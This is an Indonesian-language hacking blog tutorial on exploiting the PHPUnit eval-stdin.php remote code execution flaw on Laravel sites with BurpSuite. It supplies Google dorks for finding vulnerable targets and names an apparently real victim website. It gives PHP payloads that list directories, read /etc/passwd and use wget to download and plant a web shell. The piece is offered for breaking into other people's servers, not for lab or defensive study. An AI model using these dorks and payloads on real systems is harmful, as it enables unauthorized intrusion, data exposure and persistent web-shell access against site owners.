CilacapCyber - kali ini mimin akan berbagi tutorial kepada sobat tentang Laravel.
Mimin memanfaatkan sebuah bug dari Fitur yang di sediakan oleh pengguna laravel yaitu php unit dengan cara menggunakan remote code execution (RCE).
Mimin akan kasih tau cara upload shell metode Laravel phpUnit to RCE( Remote Code Execution ) dengan BurpSuite
Pertama siapkan :
- BurpSuite ( digoogle ada cari aja)
- Browser
Dork:
- inurl:vendor/phpunit/phpunit/src/
- inurl:/src/Util/PHP/ intitle:index of
- inurl:/Util/PHP/ "eval-stdin.php"
- sobat kembangin lagi biar dapet target lebih fresh
Exploit : /eval-stdin.php
site.co.li/vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php
#kalau punya sobat blank putih berarti vuln Oke langsung aja, disini mimin udah dapet targetnya :
http://www.olapcemetery.com//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Sobat buka burpsuite lalu > ke menu Proxy > pilih Intercept > nyalakan Intercept ( Intercept On ) Lalu sobat buka target yang tadi, dan buka BurpSuite lagi.
Nah jika sudah, klik kanan dan pilih Send to Repeater / Ctrl + R
otomatis akan masuk ke repeater, lihat kolom kiri adalah requestnya dan responsnya berada di sebelah kanan.
Nah sekarang saatnya mengeksekusi mati :v
Masukkan payload <?php system('ls');?> di kolom request, gunanya agar sobat melihat isi dalam dir /PHP/ atau bisa juga dengan <?php system('tail /etc/passwd');?> untuk melihat isi dari /etc/passwd nya, terus klik untuk melihat isi terus klik " Go ".
kalo vuln bisa di eksekusi maka akan muncul responsnya disebelah kanan, lihat gambar. Kalo ga muncul berarti tidak bisa di eksekusi.
Langsung aja sobat jebol dengan perintah wget buat manggil shell nya
- <?php system('wget link shell -o clp.php'); ?>
Note : Sobat untuk nama shell clp.phpnya bisa ganti terserah sesuai yang sobat inginkan.
Misalkan shell sobat udah ke upload, tinggal diakses Shell telah terupload
Semoga Bermanfaat.. terima Kasih 🙏